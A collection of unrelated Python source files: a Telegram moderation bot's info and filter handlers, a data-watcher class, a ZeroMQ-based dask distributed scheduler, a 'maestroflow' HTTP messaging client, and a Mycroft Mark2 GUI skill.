"'>" + self.chat["title"] + "</a> ("+str(self.chat_id)+")"
except:
chat_name = ""
try:
textt = '\nText :\n<b>------------------</b>\n<i>' + \
self.tag_msg.text + '</i>\n<b>------------------</b>'
except:
textt = "Type : #FILE"
try:
ftype = self.tag_msg.document.mime_type
file = self.tag_msg.document.file_name
file_id = self.tag_msg.document.file_unique_id
file_size = self.tag_msg.document.file_size/1000000
textt = "\nType : " + ftype + "\nFile_name : " + str(file) +"\nFile Id : " + str(file_id) + "\nfile_size : " + str(file_size) + "mb"
except Exception as x:
print(x)
textt = textt + " (Use /json for more detail)"
text = ("<b>Message Info -</b>" +
msgid +
name +
chat_name + "\n" +
textt + "\n" +
date +
edit_date +
link)
self.msg.reply_text(text=text,
parse_mode="HTML")
def json(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=0,context=self.context)
if m==0:
return
if self.tag_msg == None:
self.msg.reply_text(text="Tag a message or file to see its full backend details !",
parse_mode="HTML")
return
j = "<code>" + json.dumps(self.tag_msg, indent=4, sort_keys=True, default=str) + "</code>"
self.msg.reply_text(text=j,
parse_mode="HTML")
def router(self):
res = self.msg_string.split(None, 1)
if res[0] == "/info":
if self.tag_msg == None:
self.group_info()
else:
if self.tag_user == None:
self.tag_user = self.user
self.tag_user_id = self.user_id
self.user_info()
elif res[0] == "/json":
self.json()
elif res[0] == "/sync":
self.sync(rep=1)
elif res[0] == "/msgid":
if self.tag_msg != None:
self.msg_info()
else:
self.msg.reply_text("Tag a message !")
def thread_unparse(update, context):
threading.Thread(target=unparse_cls(update,context).router, args=(), daemon=True).start()
def filter(update,context):
#start = time.process_time()
db = database.bot_db()
msg = update.message
user = msg['from_user']
chat = msg['chat']
tag_user = None
try:
tagmsg = update.message.reply_to_message
tag_user = tagmsg['from_user']
db.add_user(user=tag_user)
except:
pass
db.parse(chat=chat, user=user)
chat_id = chat["id"]
user_id = user["id"]
sett = db.get_settings(chat_id)
filter_bool = sett[5]
note_bool = sett[6]
lock_bool = sett[7]
admin = 0
link = db.get_link(chat_id,user_id)[3]
if (link == "administrator" or link == "creator"):
admin = 1
#msg_string = None
def filter_del(): #use extractor | sudo check
if admin == 0:
msg.delete()
def filter_filt():
msg_string = msg.text
if note_bool == 1:
if msg_string.startswith("#") == True:
note_check(msg_string[1:])
return
for x,y in enumerate(db.get_filter(chat_id)):
if y[2].casefold() in msg_string.casefold():
if y[3] == 0:
if admin==0:
msg.delete()
return
elif y[3] == 1:
msg.reply_text(y[4])
if y[5] == 1:
msg.delete()
elif y[3] == 2:
if admin == 0:
warn(update,context).warn_strike(y[4])
if y[5] == 1:
msg.delete()
return
def note_check(note_name):
note = db.get_note_text(chat_id=chat_id, note_name=note_name)
try:
text = str(note[3])
msg.reply_text(text, disable_web_page_preview=True)
return
except:
#msg.reply_text("Note not found !")
return
if lock_bool == 1:
filter_del()
return
elif filter_bool == 1:
filter_filt()
elif note_bool == 1 and filter_bool == 0:
msg_string = msg.text
if msg_string.startswith("#") == True:
note_check(msg_string[1:])
return
#print("\n", time.process_time() - start, "\n")
|
data_watcher ver 2.py
|
from threading import Thread
class Watch:
""" Watch class to implement a data-observer pattern on the encapsulated data item.
The event-handlers/callbacks will be ran when the data is changed/set. """
# __on_set_cbs callback functions run the moment set method is used to set a value to the variable.
__on_set_cbs = []
# __on_change_cbs callback functions only run if the new value set is different from the previous value.
__on_change_cbs = []
def __init__(self, data):
""" Pass constructor the data item to be watched """
self.__data = data
# Method to set a value to the data variable watched by this class
def set(self, data):
# If set is called and data value has been changed, save the data and run on change callbacks
if data != self.__data: # Check for data equality, so will not work for object references
self.__data = data
# Call all the __on_change_cbs callback functions
self.__event(self.__on_change_cbs)
# Regardless of data, call all the __on_set_cbs callback functions when set method called.
self.__event(self.__on_set_cbs)
# Return self reference to allow method call chainings.
return self
# Decorated Method to use as an attribute to get watched/stored data
@property
def value(self):
return self.__data
# Method to append a new callback function to be ran when the set method is called
def on_set(self, cb):
self.__on_set_cbs.append(cb)
# Return self reference to allow method call chainings.
return self
# Method to append a new callback function to be ran when the watched data is changed
def on_change(self, cb):
self.__on_change_cbs.append(cb)
# Return self reference to allow method call chainings.
return self
def removeListener(self, cb=None):
# To implement the second part where only the specified callback function is removed.
# self.__cbs.clear() # Not sure if this method works, needs to be tested
# Return self reference to allow method call chainings.
return self
# "Hidden" method that is called when the data is changed, to run all the given callbacks in seperate threads
def __event(self, callbacks):
# Loop through and run all the callbacks as seperate threads
for cb in callbacks:
Thread(target=cb, daemon=True, args=(self.__data,)).start()
""" Allow user to do w(5) to pass set method the value 5, where w = Watch(1) """
__call__ = set
""" Allow user to do w += hello, where hello is a function passed to the on_set method """
__iadd__ = on_set
""" Note that there is no abbrev. for the on_change method call """
""" __isub__
if type(item) == object:
self.__data = hash(data)
self.__primitive = False
else:
self.__data = data
self.__primitive = True """
__add__ = on_change
|
scheduler.py
|
from __future__ import print_function
import socket
import uuid
import itertools
import traceback
import sys
import random
from collections import defaultdict
from multiprocessing.pool import ThreadPool
from datetime import datetime
from threading import Thread, Lock, Event
from contextlib import contextmanager
import dill
import zmq
from ..compatibility import Queue, unicode, Empty
try:
import cPickle as pickle
except ImportError:
import pickle
from ..core import get_dependencies, flatten
from .. import core
from ..async import (sortkey, finish_task,
start_state_from_dask as dag_state_from_dask)
with open('log.scheduler', 'w') as f: # delete file
pass
def log(*args):
with open('log.scheduler', 'a') as f:
print('\n', *args, file=f)
@contextmanager
def logerrors():
try:
yield
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
tb = ''.join(traceback.format_tb(exc_traceback))
log('Error!', str(e))
log('Traceback', str(tb))
raise
class Scheduler(object):
""" Disitributed scheduler for dask computations
Parameters
----------
hostname: string
hostname or IP address of this machine visible to outside world
port_to_workers: int
Port on which to listen to connections from workers
port_to_clients: int
Port on which to listen to connections from clients
bind_to_workers: string
Addresses from which we accept worker connections, defaults to *
bind_to_clients: string
Addresses from which we accept client connections, defaults to *
block: bool
Whether or not to block the process on creation
State
-----
workers - dict
Maps worker identities to information about that worker
who_has - dict
Maps data keys to sets of workers that own that data
worker_has - dict
Maps workers to data that they own
data - dict
Maps data keys to metadata about the computation that produced it
to_workers - zmq.Socket (ROUTER)
Socket to communicate to workers
to_clients - zmq.Socket (ROUTER)
Socket to communicate with users
collections - dict
Dict holding shared collections like bags and arrays
"""
def __init__(self, port_to_workers=None, port_to_clients=None,
bind_to_workers='*', bind_to_clients='*',
hostname=None, block=False, worker_timeout=20):
self.context = zmq.Context()
hostname = hostname or socket.gethostname()
# Bind routers to addresses (and create addresses if necessary)
self.to_workers = self.context.socket(zmq.ROUTER)
if port_to_workers is None:
port_to_workers = self.to_workers.bind_to_random_port('tcp://' + bind_to_workers)
else:
self.to_workers.bind('tcp://%s:%d' % (bind_to_workers, port_to_workers))
self.address_to_workers = ('tcp://%s:%d' % (hostname, port_to_workers)).encode()
self.worker_poller = zmq.Poller()
self.worker_poller.register(self.to_workers, zmq.POLLIN)
self.to_clients = self.context.socket(zmq.ROUTER)
if port_to_clients is None:
port_to_clients = self.to_clients.bind_to_random_port('tcp://' + bind_to_clients)
else:
self.to_clients.bind('tcp://%s:%d' % (bind_to_clients, port_to_clients))
self.address_to_clients = ('tcp://%s:%d' % (hostname, port_to_clients)).encode()
# Client state
self.clients = dict()
# State about my workers and computed data
self.workers = dict()
self.who_has = defaultdict(set)
self.worker_has = defaultdict(set)
self.available_workers = Queue()
self.data = defaultdict(dict)
self.collections = dict()
self.send_to_workers_queue = Queue()
self.send_to_workers_recv = self.context.socket(zmq.PAIR)
_port = self.send_to_workers_recv.bind_to_random_port('tcp://127.0.0.1')
self.send_to_workers_send = self.context.socket(zmq.PAIR)
self.send_to_workers_send.connect('tcp://127.0.0.1:%d' % _port)
self.worker_poller.register(self.send_to_workers_recv, zmq.POLLIN)
self.pool = ThreadPool(100)
self.lock = Lock()
self.status = 'run'
self.queues = dict()
self._schedule_lock = Lock()
# RPC functions that workers and clients can trigger
self.worker_functions = {'heartbeat': self._heartbeat,
'status': self._status_to_worker,
'finished-task': self._worker_finished_task,
'setitem-ack': self._setitem_ack,
'getitem-ack': self._getitem_ack}
self.client_functions = {'status': self._status_to_client,
'get_workers': self._get_workers,
'register': self._client_registration,
'schedule': self._schedule_from_client,
'set-collection': self._set_collection,
'get-collection': self._get_collection,
'close': self._close}
# Away we go!
log(self.address_to_workers, 'Start')
self._listen_to_workers_thread = Thread(target=self._listen_to_workers)
self._listen_to_workers_thread.start()
self._listen_to_clients_thread = Thread(target=self._listen_to_clients)
self._listen_to_clients_thread.start()
self._monitor_workers_event = Event()
self._monitor_workers_thread = Thread(target=self._monitor_workers,
kwargs={'timeout': worker_timeout})
self._monitor_workers_thread.start()
if block:
self.block()
def _listen_to_workers(self):
""" Event loop: Listen to worker router """
while self.status != 'closed':
try:
socks = dict(self.worker_poller.poll(100))
if not socks:
continue
except zmq.ZMQError:
break
if (self.send_to_workers_recv in socks and
not self.send_to_workers_recv.closed):
self.send_to_workers_recv.recv()
while not self.send_to_workers_queue.empty():
msg = self.send_to_workers_queue.get()
self.to_workers.send_multipart(msg)
self.send_to_workers_queue.task_done()
if self.to_workers in socks:
address, header, payload = self.to_workers.recv_multipart()
header = pickle.loads(header)
if 'address' not in header:
header['address'] = address
log(self.address_to_workers, 'Receive job from worker', header)
try:
function = self.worker_functions[header['function']]
except KeyError:
log(self.address_to_workers, 'Unknown function', header)
else:
future = self.pool.apply_async(function, args=(header, payload))
def _listen_to_clients(self):
""" Event loop: Listen to client router """
while self.status != 'closed':
try:
if not self.to_clients.poll(100): # is this threadsafe?
continue
except zmq.ZMQError:
break
with self.lock:
address, header, payload = self.to_clients.recv_multipart()
header = pickle.loads(header)
if 'address' not in header:
header['address'] = address
log(self.address_to_clients, 'Receive job from client', header)
try:
function = self.client_functions[header['function']]
except KeyError:
log(self.address_to_clients, 'Unknown function', header)
else:
self.pool.apply_async(function, args=(header, payload))
def _monitor_workers(self, timeout=20):
""" Event loop: Monitor worker heartbeats """
while self.status != 'closed':
self._monitor_workers_event.wait(timeout)
self.prune_and_notify(timeout=timeout)
self._monitor_workers_event.clear()
def block(self):
""" Block until listener threads close
Warning: If some other thread doesn't call `.close()` then, in the
common case you can not easily escape from this.
"""
self._monitor_workers_thread.join()
self._listen_to_workers_thread.join()
self._listen_to_clients_thread.join()
def _client_registration(self, header, payload):
""" Client comes in, register it, send back info about the cluster"""
payload = pickle.loads(payload)
address = header['address']
self.clients[address] = payload
out_header = {}
out_payload = {'workers': self.workers}
self.send_to_client(header['address'], out_header, out_payload)
def _worker_finished_task(self, header, payload):
""" Worker reports back as having finished task, ready for more
See also:
Scheduler.trigger_task
Scheduler.schedule
"""
with logerrors():
address = header['address']
payload = pickle.loads(payload)
key = payload['key']
duration = payload['duration']
dependencies = payload['dependencies']
log(self.address_to_workers, 'Finish task', payload)
for dep in dependencies:
self.who_has[dep].add(address)
self.worker_has[address].add(dep)
self.available_workers.put(address)
if isinstance(payload['status'], Exception):
self.queues[payload['queue']].put(payload)
else:
self.data[key]['duration'] = duration
self.who_has[key].add(address)
self.worker_has[address].add(key)
self.queues[payload['queue']].put(payload)
def _status_to_client(self, header, payload):
with logerrors():
out_header = {'jobid': header.get('jobid')}
log(self.address_to_clients, 'Status')
self.send_to_client(header['address'], out_header, 'OK')
def _status_to_worker(self, header, payload):
out_header = {'jobid': header.get('jobid')}
log(self.address_to_workers, 'Status sending')
self.send_to_worker(header['address'], out_header, 'OK')
def send_to_worker(self, address, header, payload):
""" Send packet to worker """
log(self.address_to_workers, 'Send to worker', address, header)
header['address'] = self.address_to_workers
loads = header.get('loads', pickle.loads)
dumps = header.get('dumps', pickle.dumps)
if isinstance(address, unicode):
address = address.encode()
header['timestamp'] = datetime.utcnow()
self.send_to_workers_queue.put([address,
pickle.dumps(header),
dumps(payload)])
self.send_to_workers_send.send(b'')
def send_to_client(self, address, header, result):
""" Send packet to client """
log(self.address_to_clients, 'Send to client', address, header)
header['address'] = self.address_to_clients
loads = header.get('loads', pickle.loads)
dumps = header.get('dumps', pickle.dumps)
if isinstance(address, unicode):
address = address.encode()
header['timestamp'] = datetime.utcnow()
with self.lock:
self.to_clients.send_multipart([address,
pickle.dumps(header),
dumps(result)])
def trigger_task(self, dsk, key, queue):
""" Send a single task to the next available worker
See also:
Scheduler.schedule
Scheduler.worker_finished_task
"""
deps = get_dependencies(dsk, key)
worker = self.available_workers.get()
locations = dict((dep, self.who_has[dep]) for dep in deps)
header = {'function': 'compute', 'jobid': key,
'dumps': dill.dumps, 'loads': dill.loads}
payload = {'key': key, 'task': dsk[key], 'locations': locations,
'queue': queue}
self.send_to_worker(worker, header, payload)
def release_key(self, key):
""" Release data from all workers
Example
-------
>>> scheduler.release_key('x') # doctest: +SKIP
Protocol
--------
This sends a 'delitem' request to all workers known to have this key.
This operation is fire-and-forget. Local indices will be updated
immediately.
"""
with logerrors():
workers = list(self.who_has[key])
log(self.address_to_workers, 'Release data', key, workers)
header = {'function': 'delitem', 'jobid': key}
payload = {'key': key}
for worker in workers:
self.send_to_worker(worker, header, payload)
self.who_has[key].remove(worker)
self.worker_has[worker].remove(key)
def send_data(self, key, value, address=None, reply=True):
""" Send data up to some worker
If no address is given we select one worker randomly
Example
-------
>>> scheduler.send_data('x', 10) # doctest: +SKIP
>>> scheduler.send_data('x', 10, 'tcp://bob:5000', reply=False) # doctest: +SKIP
Protocol
--------
1. Scheduler makes a queue
2. Scheduler selects a worker at random (or uses prespecified worker)
3. Scheduler sends 'setitem' operation to that worker
{'key': ..., 'value': ..., 'queue': ...}
4. Worker gets data and stores locally, send 'setitem-ack'
{'key': ..., 'queue': ...}
5. Scheduler gets from queue, send_data cleans up queue and returns
See also:
Scheduler.setitem_ack
Worker.setitem
Scheduler.scatter
"""
if reply:
queue = Queue()
qkey = str(uuid.uuid1())
self.queues[qkey] = queue
else:
qkey = None
if address is None:
address = random.choice(list(self.workers))
header = {'function': 'setitem', 'jobid': key}
payload = {'key': key, 'value': value, 'queue': qkey}
self.send_to_worker(address, header, payload)
if reply:
queue.get()
del self.queues[qkey]
def scatter(self, key_value_pairs, block=True):
""" Scatter data to workers
Parameters
----------
key_value_pairs: Iterator or dict
Data to send
block: bool
Block on completion or return immediately (defaults to True)
Example
-------
>>> scheduler.scatter({'x': 1, 'y': 2}) # doctest: +SKIP
Protocol
--------
1. Scheduler starts up a uniquely identified queue.
2. Scheduler sends 'setitem' requests to workers with
{'key': ..., 'value': ... 'queue': ...}
3. Scheduler waits on queue for all responses
4. Workers receive 'setitem' requests, send back on 'setitem-ack' with
{'key': ..., 'queue': ...}
5. Scheduler's 'setitem-ack' function pushes keys into the queue
6. Once the same number of replies is heard scheduler scatter function
returns
7. Scheduler cleans up queue
See Also:
Scheduler.setitem_ack
Worker.setitem_scheduler
"""
workers = list(self.workers)
log(self.address_to_workers, 'Scatter', workers, key_value_pairs)
workers = itertools.cycle(workers)
if isinstance(key_value_pairs, dict):
key_value_pairs = key_value_pairs.items()
queue = Queue()
qkey = str(uuid.uuid1())
self.queues[qkey] = queue
counter = 0
for (k, v), w in zip(key_value_pairs, workers):
header = {'function': 'setitem', 'jobid': k}
payload = {'key': k, 'value': v}
if block:
payload['queue'] = qkey
self.send_to_worker(w, header, payload)
counter += 1
if block:
for i in range(counter):
queue.get()
del self.queues[qkey]
def gather(self, keys):
""" Gather data from workers
Parameters
----------
keys: key, list of keys, nested list of lists of keys
Keys to collect from workers
Example
-------
>>> scheduler.gather('x') # doctest: +SKIP
>>> scheduler.gather([['x', 'y'], ['z']]) # doctest: +SKIP
Protocol
--------
1. Scheduler starts up a uniquely identified queue.
2. Scheduler sends 'getitem' requests to workers with payloads
{'key': ..., 'queue': ...}
3. Scheduler waits on queue for all responses
3. Workers receive 'getitem' requests, send data back on 'getitem-ack'
{'key': ..., 'value': ..., 'queue': ...}
4. Scheduler's 'getitem-ack' function pushes key/value pairs onto queue
5. Once the same number of replies is heard the gather function
collects data into form specified by keys input and returns
6. Scheduler cleans up queue before returning
See Also:
Scheduler.getitem_ack
Worker.getitem_scheduler
"""
qkey = str(uuid.uuid1())
queue = Queue()
self.queues[qkey] = queue
# Send of requests
self._gather_send(qkey, keys)
# Wait for replies
cache = dict()
for i in flatten(keys):
k, v = queue.get()
cache[k] = v
del self.queues[qkey]
# Reshape to keys
return core.get(cache, keys)
def _gather_send(self, qkey, key):
if isinstance(key, list):
for k in key:
self._gather_send(qkey, k)
else:
header = {'function': 'getitem', 'jobid': key}
payload = {'key': key, 'queue': qkey}
seq = list(self.who_has[key])
worker = random.choice(seq)
self.send_to_worker(worker, header, payload)
def _getitem_ack(self, header, payload):
""" Receive acknowledgement from worker about a getitem request
See also:
Scheduler.gather
Worker.getitem
"""
payload = pickle.loads(payload)
log(self.address_to_workers, 'Getitem ack', payload['key'],
payload['queue'])
with logerrors():
assert header['status'] == 'OK'
self.queues[payload['queue']].put((payload['key'],
payload['value']))
def _setitem_ack(self, header, payload):
""" Receive acknowledgement from worker about a setitem request
See also:
Scheduler.scatter
Worker.setitem
"""
address = header['address']
payload = pickle.loads(payload)
key = payload['key']
self.who_has[key].add(address)
self.worker_has[address].add(key)
queue = payload.get('queue')
if queue:
self.queues[queue].put(key)
def close_workers(self):
header = {'function': 'close'}
while self.workers != {}:
w, v = self.workers.popitem()
self.send_to_worker(w, header, {})
self.send_to_workers_queue.join()
def _close(self, header, payload):
self.close()
def close(self):
""" Close Scheduler """
self.close_workers()
self.status = 'closed'
self._monitor_workers_event.set()
self.to_workers.close(linger=1)
self.to_clients.close(linger=1)
self.send_to_workers_send.close(linger=1)
self.send_to_workers_recv.close(linger=1)
self.pool.close()
self.pool.join()
self.block()
self.context.destroy(linger=3)
def schedule(self, dsk, result, **kwargs):
""" Execute dask graph against workers
Parameters
----------
dsk: dict
Dask graph
result: list
keys to return (possibly nested)
Example
-------
>>> scheduler.get({'x': 1, 'y': (add, 'x', 2)}, 'y') # doctest: +SKIP
3
Protocol
--------
1. Scheduler scatters precomputed data in graph to workers
e.g. nodes like ``{'x': 1}``. See Scheduler.scatter
2.
"""
with self._schedule_lock:
log(self.address_to_workers, "Scheduling dask")
if isinstance(result, list):
result_flat = set(flatten(result))
else:
result_flat = set([result])
results = set(result_flat)
cache = dict()
dag_state = dag_state_from_dask(dsk, cache=cache)
if cache:
self.scatter(cache.items()) # send data in dask up to workers
tick = [0]
if dag_state['waiting'] and not dag_state['ready']:
raise ValueError("Found no accessible jobs in dask graph")
event_queue = Queue()
qkey = str(uuid.uuid1())
self.queues[qkey] = event_queue
def fire_task():
tick[0] += 1 # Update heartbeat
# Choose a good task to compute
key = dag_state['ready'].pop()
dag_state['ready-set'].remove(key)
dag_state['running'].add(key)
self.trigger_task(dsk, key, qkey) # Fire
try:
worker = self.available_workers.get(timeout=20)
self.available_workers.put(worker) # put him back in
except Empty:
raise ValueError("Waited 20 seconds. No workers found")
# Seed initial tasks
while dag_state['ready'] and self.available_workers.qsize() > 0:
fire_task()
# Main loop, wait on tasks to finish, insert new ones
while dag_state['waiting'] or dag_state['ready'] or dag_state['running']:
payload = event_queue.get()
if isinstance(payload['status'], Exception):
raise payload['status']
key = payload['key']
finish_task(dsk, key, dag_state, results, sortkey,
release_data=self._release_data)
while dag_state['ready'] and self.available_workers.qsize() > 0:
fire_task()
result2 = self.gather(result)
for key in flatten(result): # release result data from workers
self.release_key(key)
return result2
def _schedule_from_client(self, header, payload):
"""
Input Payload: keys, dask
Output Payload: keys, result
Sent to client on 'schedule-ack'
"""
with logerrors():
loads = header.get('loads', dill.loads)
payload = loads(payload)
address = header['address']
dsk = payload['dask']
keys = payload['keys']
header2 = {'jobid': header.get('jobid'),
'function': 'schedule-ack'}
try:
result = self.schedule(dsk, keys)
header2['status'] = 'OK'
except Exception as e:
result = e
header2['status'] = 'Error'
payload2 = {'keys': keys, 'result': result}
self.send_to_client(address, header2, payload2)
def _release_data(self, key, state, delete=True):
""" Remove data from temporary storage during scheduling run
See Also
Scheduler.schedule
dask.async.finish_task
"""
if key in state['waiting_data']:
assert not state['waiting_data'][key]
del state['waiting_data'][key]
state['released'].add(key)
if delete:
self.release_key(key)
def _set_collection(self, header, payload):
with logerrors():
log(self.address_to_clients, "Set collection", header)
payload = header.get('loads', dill.loads)(payload)
self.collections[payload['name']] = payload
self.send_to_client(header['address'], {'status': 'OK'}, {})
def _get_collection(self, header, payload):
with logerrors():
log(self.address_to_clients, "Get collection", header)
payload = header.get('loads', pickle.loads)(payload)
payload2 = self.collections[payload['name']]
header2 = {'status': 'OK',
'loads': dill.loads,
'dumps': dill.dumps}
self.send_to_client(header['address'], header2, payload2)
def _get_workers(self, header, payload):
with logerrors():
log(self.address_to_clients, "Get workers", header)
self.send_to_client(header['address'],
{'status': 'OK'},
{'workers': self.workers})
def _heartbeat(self, header, payload):
with logerrors():
log(self.address_to_clients, "Heartbeat", header)
payload = pickle.loads(payload)
address = header['address']
if address not in self.workers:
self.available_workers.put(address)
self.workers[address] = payload
self.workers[address]['last-seen'] = datetime.utcnow()
def prune_workers(self, timeout=20):
"""
Remove workers from scheduler that have not sent a heartbeat in
`timeout` seconds.
"""
now = datetime.utcnow()
remove = []
for worker, data in self.workers.items():
if abs(data['last-seen'] - now).microseconds > (timeout * 1e6):
remove.append(worker)
[self.workers.pop(r) for r in remove]
return remove
def prune_and_notify(self, timeout=20):
removed = self.prune_workers(timeout=timeout)
if removed != []:
for w_address in self.workers:
header = {'function': 'worker-death'}
payload = {'removed': removed}
self.send_to_worker(w_address, header, payload)
|
maestroflow.py
|
import requests
from aiohttp import web
import threading
import queue
import asyncio
import time
import signal
import sys
import os
import base64
import socket
def get_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("",0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def image(png_filename):
with open(png_filename, "rb") as image_file:
encoded_string = base64.b64encode(image_file.read())
return encoded_string.decode('utf-8')
def server(host, port, loop_queue, result_queue):
loop = asyncio.new_event_loop()
loop_queue.put(loop)
asyncio.set_event_loop(loop)
async def receive(request):
result_queue.put(request)
return web.Response(text="ok")
app = web.Application()
app.add_routes([web.get('/', receive)])
app.add_routes([web.post('/', receive)])
web.run_app(app, host=host, port=port)
class Application:
def __init__(self, name, logo, host="127.0.0.1", port=None, maestroflow_addr="http://127.0.0.1:54921/"):
if port is None:
port = get_open_port()
self.port = port
self.name = name
self.logo = logo
self.host = host
self.http_addr = "http://" + self.host + ":" + str(self.port)
self.maestroflow_addr = maestroflow_addr
self.sources = []
self.sinks = {}
self.send({'commType': 'ApplicationAnnouncement', 'name': name, 'logo': logo})
self.recieve_queue = queue.Queue()
loop_queue = queue.Queue()
self.server_thread = threading.Thread(target=server, args=(host, port, loop_queue, self.recieve_queue))
self.server_thread.start()
self.loop = loop_queue.get()
def add_source(self, source):
self.sources.append(source)
def add_sink(self, sink):
self.sinks[sink.path] = sink
def send(self, data):
data['application'] = self.name
data['addr'] = self.http_addr
requests.post(self.maestroflow_addr, data=data)
def poll(self):
while not self.recieve_queue.empty():
query = self.recieve_queue.get().query
if 'commType' in query and 'application' in query and 'path' in query and 'typeName' in query and 'data' in query:
comm_type = query['commType']
application = query['application']
path = query['path']
if comm_type == 'EventAnnouncement' and application == self.name and path in self.sinks:
type_name = query['typeName']
data = query['data']
sink = self.sinks[path]
event = Event(application, path, type_name, data)
sink.notify(event)
def stop(self):
self.loop.stop()
# Thes server will not actually process the stop immediately for some reason. As a hack,
# we send it a bogus message so that it will actually die
requests.post(self.http_addr)
self.server_thread.join()
class Event:
def __init__(self, application, path, type_name, data):
self.application = application
self.path = path
self.type_name = type_name
self.data = data
class Source:
def __init__(self, application, path, type_name):
self.application = application
self.application.add_source(self)
self.path = self.application.name + "." + path
self.type_name = type_name
self.application.send({'commType': 'SourceAnnouncement', 'path': self.path, 'typeName': self.type_name})
def notify(self, data):
self.application.send({'commType': 'EventAnnouncement', 'path': self.path, 'typeName': self.type_name, 'data': data})
#http://127.0.0.1:54921/?type=SinkAnnouncement&application=foobar&path=foobarqux&typeName=color
class Sink:
def __init__(self, application, path, type_name):
self.path = application.name + "." + path
self.application = application
self.application.add_sink(self)
self.type_name = type_name
self.application.send({'commType': 'SinkAnnouncement', 'path': self.path, 'typeName': self.type_name})
self.callbacks = []
def on_notify(self, callback):
self.callbacks.append(callback)
def notify(self, event):
for callback in self.callbacks:
callback(event.data)
|
__init__.py
|
# Copyright 2018 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import astral
import time
import arrow
from pytz import timezone
from datetime import datetime
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill
from mycroft.util import get_ipc_directory
from mycroft.util.log import LOG
from mycroft.util.parse import normalize
from mycroft import intent_file_handler
import os
import subprocess
import pyaudio
from threading import Thread, Lock
from .listener import (get_rms, open_mic_stream, read_file_from,
INPUT_FRAMES_PER_BLOCK)
# Definitions used when sending volume over i2c
VOL_MAX = 30
VOL_OFFSET = 15
VOL_SMAX = VOL_MAX - VOL_OFFSET
VOL_ZERO = 0
def compare_origin(m1, m2):
origin1 = m1.data['__from'] if isinstance(m1, Message) else m1
origin2 = m2.data['__from'] if isinstance(m2, Message) else m2
return origin1 == origin2
def clip(val, minimum, maximum):
""" Clips / limits a value to a specific range.
Arguments:
val: value to be limited
minimum: minimum allowed value
maximum: maximum allowed value
"""
return min(max(val, minimum), maximum)
class Mark2(MycroftSkill):
"""
The Mark2 skill handles much of the gui activities related to
Mycroft's core functionality. This includes showing "listening",
"thinking", and "speaking" faces as well as more complicated things
such as switching to the selected resting face and handling
system signals.
"""
def __init__(self):
super().__init__('Mark2')
self.i2c_channel = 1
self.idle_screens = {}
self.override_idle = None
self.idle_next = 0 # Next time the idle screen should trigger
self.idle_lock = Lock()
self.settings['auto_brightness'] = False
self.settings['use_listening_beep'] = True
self.has_show_page = False # resets with each handler
# Volume indicatior
self.thread = None
self.pa = pyaudio.PyAudio()
try:
self.listener_file = os.path.join(get_ipc_directory(), 'mic_level')
self.st_results = os.stat(self.listener_file)
except Exception:
self.listener_file = None
self.st_results = None
self.max_amplitude = 0.001
# System volume
self.volume = 0.5
self.muted = False
self.get_hardware_volume() # read from the device
self.idle_override_set_time = time.monotonic()
def setup_mic_listening(self):
""" Initializes PyAudio, starts an input stream and launches the
listening thread.
"""
listener_conf = self.config_core['listener']
self.stream = open_mic_stream(self.pa,
listener_conf.get('device_index'),
listener_conf.get('device_name'))
self.amplitude = 0
def initialize(self):
""" Perform initalization.
Registers messagebus handlers and sets default gui values.
"""
enclosure_info = self.config_core.get('enclosure', {})
self.i2c_channel = enclosure_info.get('i2c_channel',
self.i2c_channel)
self.brightness_dict = self.translate_namedvalues('brightness.levels')
self.gui['volume'] = 0
# Prepare GUI Viseme structure
self.gui['viseme'] = {'start': 0, 'visemes': []}
# Preselect Time and Date as resting screen
self.gui['selected'] = self.settings.get('selected', 'Time and Date')
self.gui.set_on_gui_changed(self.save_resting_screen)
try:
self.add_event('mycroft.internet.connected',
self.handle_internet_connected)
# Handle the 'waking' visual
self.add_event('recognizer_loop:record_begin',
self.handle_listener_started)
self.add_event('recognizer_loop:record_end',
self.handle_listener_ended)
self.add_event('mycroft.speech.recognition.unknown',
self.handle_failed_stt)
# Handle the 'busy' visual
self.bus.on('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.on('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.on('mycroft.awoken',
self.on_handler_awoken)
self.bus.on('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.on('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.on('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.on('gui.page.show',
self.on_gui_page_show)
self.bus.on('gui.page_interaction', self.on_gui_page_interaction)
self.bus.on('mycroft.skills.initialized', self.reset_face)
self.bus.on('mycroft.mark2.register_idle',
self.on_register_idle)
self.add_event('mycroft.mark2.reset_idle',
self.restore_idle_screen)
# Handle device settings events
self.add_event('mycroft.device.settings',
self.handle_device_settings)
# Use Legacy for QuickSetting delegate
self.gui.register_handler('mycroft.device.settings',
self.handle_device_settings)
self.gui.register_handler('mycroft.device.settings.homescreen',
self.handle_device_homescreen_settings)
self.gui.register_handler('mycroft.device.settings.ssh',
self.handle_device_ssh_settings)
self.gui.register_handler('mycroft.device.settings.reset',
self.handle_device_factory_reset_settings)
self.gui.register_handler('mycroft.device.settings.update',
self.handle_device_update_settings)
self.gui.register_handler('mycroft.device.settings.restart',
self.handle_device_restart_action)
self.gui.register_handler('mycroft.device.settings.poweroff',
self.handle_device_poweroff_action)
self.gui.register_handler('mycroft.device.settings.wireless',
self.handle_show_wifi_screen_intent)
self.gui.register_handler('mycroft.device.show.idle',
self.show_idle_screen)
# Handle idle selection
self.gui.register_handler('mycroft.device.set.idle',
self.set_idle_screen)
# System events
self.add_event('system.reboot', self.handle_system_reboot)
self.add_event('system.shutdown', self.handle_system_shutdown)
# Handle volume setting via I2C
self.add_event('mycroft.volume.set', self.on_volume_set)
self.add_event('mycroft.volume.get', self.on_volume_get)
# Show loading screen while starting up skills.
# self.gui['state'] = 'loading'
# self.gui.show_page('all.qml')
# Collect Idle screens and display if skill is restarted
self.collect_resting_screens()
except Exception:
LOG.exception('In Mark 2 Skill')
